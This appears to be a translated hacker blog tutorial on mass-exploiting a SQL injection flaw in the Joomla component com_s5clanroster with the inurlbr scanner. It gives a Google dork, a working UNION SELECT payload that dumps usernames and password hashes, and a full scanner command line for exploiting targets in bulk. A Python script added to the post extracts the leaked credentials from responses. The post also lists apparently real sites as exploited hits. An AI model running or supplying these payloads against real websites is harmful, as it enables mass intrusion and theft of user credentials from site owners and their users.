MASS EXPLOITATION: Joomla - com_s5clanroster
USING INURLBR
In this tutorial we use the inurlbr scanner to find targets with a Google dork and then inject our exploit string into each of them. We use an internal function of the inurlbr script to convert a marker string inside the injection to hexadecimal, so that the scanner can tell which targets are actually vulnerable.
The com_s5clanroster component has a SQL injection flaw in its GET parameter "id". This article is based on the script written by the hacker TheLooper (script); where the injection succeeds, it gives access to information from the target server's database.
DORK:
inurl:"index.php?option=com_s5clanroster"
SQL INJECTION:
%27+/*!50000UnIoN*/+/*!50000SeLeCt*/+group_concat(username,0x3a,password),222+from+jos_users--%20-
POC:
http://www.target.gov.br/index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=-null{SQL INJECTION}
With this information we can assemble our command for mass exploitation.
Let's use the scanner inurlbr:
http://github.com/googleinurl/SCANNER-INURLBR
SET DORK:
--dork 'inurl:"index.php?option=com_s5clanroster"'
SET OUTPUT FILE:
-s vuln.log
SET VALIDATION TYPE:
-t 3
3 - The third type combines the first and second types: it also establishes a connection to each target with the exploit appended, through the GET method.
Demo: www.target.com.br{exploit}
SET EXPLOIT REQUEST - GET:
--exploit-get {YOUR_GET}
Before setting the exploit we manipulate its string: using an internal function of the inurlbr scanner we pass a validation string inside the SQL injection, so that vulnerable targets can be separated from the rest.
Internal function - converting strings to hexadecimal
hex: encodes values as hexadecimal (this is encoding, not encryption).
Example: hex({value})
Usage: hex(102030)
Usage: --exploit-get 'user?id=hex(102030)'
Resulting injection:
http://www.target.gov.br/user?id=313032303330
--exploit-get '/index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=-null%27+/*!50000UnIoN*/+/*!50000SeLeCt*/+group_concat(0xhex(inurlbr_vuln),username,password,0xhex(<br>)),222+from+jos_users--%20-'
hex(inurlbr_vuln) = 696e75726c62725f76756c6e
hex(<br>) = 3c62723e
Example injection (with both placeholders expanded):
http://www.target.gov.br/index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=-null%27+/*!50000UnIoN*/+/*!50000SeLeCt*/+group_concat(0x696e75726c62725f76756c6e,username,password,0x3c62723e),222+from+jos_users--%20-
SET VALIDATION STRING:
Specify the string that will be searched for in each target's response:
Example: -a {string}
Usage: -a '<title>hello world</title>'
If the specified value is found in the target's response, the target is considered vulnerable.
Setting: -a 'inurlbr_vuln'
We validate on the string "inurlbr_vuln" because it was passed inside the SQLi exploit: if this value appears in the target's response, the injection was executed successfully.
php inurlbr.php --dork 'inurl:"index.php?option=com_s5clanroster"' -s vuln.log -t 3 --exploit-get '/index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=-null%27+/*!50000UnIoN*/+/*!50000SeLeCt*/+group_concat(0xhex(inurlbr_vuln),username,password,0xhex(<br>)),222+from+jos_users--%20-' -a 'inurlbr_vuln'
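To make the validation trick concrete, here is an added example in Python (not part of the original post, and not inurlbr's own code) that reproduces what the internal hex() function and the -a check do together: it expands the hex(...) placeholders in the exploit string into hex literals, appends the result to each base URL, and then inspects each response for the marker, pulling out the rows that the group_concat leaked. It runs offline against constructed responses; the target hostnames, the fake fetch function and the extra 0x3a (":") separator between username and password in the template are assumptions for the example.

```python
import re
from typing import Callable, Dict, Iterable, List, Optional, Tuple

# Marker string that the injected query is made to echo back, and the separator
# appended after every leaked row. Both are hex-encoded inside the payload so the
# injection needs no quote characters, and the scanner later greps for the marker.
MARKER = "inurlbr_vuln"
ROW_END = "<br>"

# Exploit string from the post, with one assumed addition for this example: a 0x3a (":")
# literal between username and password so each leaked row can be split.
EXPLOIT_TEMPLATE = (
    "/index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category"
    "&id=-null%27+/*!50000UnIoN*/+/*!50000SeLeCt*/+group_concat(0xhex(inurlbr_vuln),"
    "username,0x3a,password,0xhex(<br>)),222+from+jos_users--%20-"
)


def to_hex(value: str) -> str:
    """Hex-encode a string the way the post's hex() helper does: bare hex digits,
    no 0x prefix (the template supplies the 0x itself)."""
    return value.encode("utf-8").hex()


_HEX_CALL = re.compile(r"hex\(([^()]*)\)")


def expand_hex_placeholders(template: str) -> str:
    """Replace every hex(<text>) placeholder with the hex encoding of <text>."""
    return _HEX_CALL.sub(lambda m: to_hex(m.group(1)), template)


def check_response(body: str) -> Optional[List[Tuple[str, str]]]:
    """Return None when the marker is absent (the injection did not execute),
    otherwise the (username, password_hash) pairs found between each marker and <br>.

    A target that only throws a MySQL error does not contain the marker, so it is
    not reported: the marker check confirms that data really came back from
    jos_users, which is stricter than matching on error strings alone."""
    if MARKER not in body:
        return None
    pattern = re.escape(MARKER) + r"(.*?)" + re.escape(ROW_END)
    rows = []
    for chunk in re.findall(pattern, body, re.S):
        user, _, pw_hash = chunk.partition(":")  # split on the first ':' only; Joomla hashes also contain ':'
        rows.append((user, pw_hash))
    return rows


def scan(targets: Iterable[str], fetch: Callable[[str], str]) -> Dict[str, List[Tuple[str, str]]]:
    """Append the expanded exploit to each base URL, fetch it, and keep only the
    targets whose response echoes the marker (what -t 3 together with -a does)."""
    exploit = expand_hex_placeholders(EXPLOIT_TEMPLATE)
    hits: Dict[str, List[Tuple[str, str]]] = {}
    for base in targets:
        rows = check_response(fetch(base.rstrip("/") + exploit))
        if rows is not None:
            hits[base] = rows
    return hits


# Constructed sample responses: hostnames and bodies are invented for this example.
FAKE_RESPONSES = {
    "http://target-a.example": (
        "<html><body><h1>Clan roster</h1><td>"
        "inurlbr_vulnadmin:d41d8cd98f00b204e9800998ecf8427e:Xy9z<br>,"
        "inurlbr_vulneditor:$2y$10$exampleexamplehash<br></td></body></html>"
    ),
    "http://target-b.example": "<html><body><h1>Clan roster</h1><td>222</td></body></html>",
    "http://target-c.example": "<html><body>You have an error in your SQL syntax</body></html>",
}


def fake_fetch(url: str) -> str:
    """Offline stand-in for an HTTP GET: look the base URL up in FAKE_RESPONSES."""
    base = url.split("/index.php", 1)[0]
    return FAKE_RESPONSES[base]


if __name__ == "__main__":
    print("exploit:", expand_hex_placeholders(EXPLOIT_TEMPLATE))
    for host, rows in scan(FAKE_RESPONSES, fake_fetch).items():
        print(host)
        for user, pw_hash in rows:
            print("  ", user, pw_hash)
```

Only target-a is reported: target-b returns the page normally and target-c only returns a MySQL error, neither of which contains the marker, so both would be discarded by the -a check even though an error-string check alone would have flagged target-c.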
PRINT PROCESS:
By default, only one result is found, and it doesn't bring the password with it. lol
www.meleeboys.com/index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=-null%27+/*!50000UnIoN*/+/*!50000SeLeCt*/+group_concat(0xhex(inurlbr_vuln),username,password,0xhex(<br>)),222+from+jos_users--%20-
www.skala-club.vn.ua/index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=-null%27+/*!50000UnIoN*/+/*!50000SeLeCt*/+group_concat(0xhex(inurlbr_vuln),username,password,0xhex(<br>)),222+from+jos_users--%20-
toxic.h5n1.free.fr/index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=-null%27+/*!50000UnIoN*/+/*!50000SeLeCt*/+group_concat(0xhex(inurlbr_vuln),username,password,0xhex(<br>)),222+from+jos_users--%20-
Hi friend, all of this is 80% more about showing the technique I used to validate the flaw: passing the string inside the SQLi with the script's internal function converting it to hexadecimal.
But clearly it can be used in other ways and on other CMSs.
It can even be used with a wordlist full of SQLi, following the scanner's internal SUB_PROCESS pattern.
Afterwards, look up the sub_process feature of the INURLBR scanner.
Any questions, we're here :) ~ cya
Value our language, translate the content before posting!
The content was always in PT-BR, but because it is used by many people from the Middle East, Russians, Chinese... friends from other countries.
English is the simplest language to understand and the standard for tools all over the world.
It is not a question of valuing language X or Y, but a question of logic and simplicity, so that the whole community can easily translate the content posted here.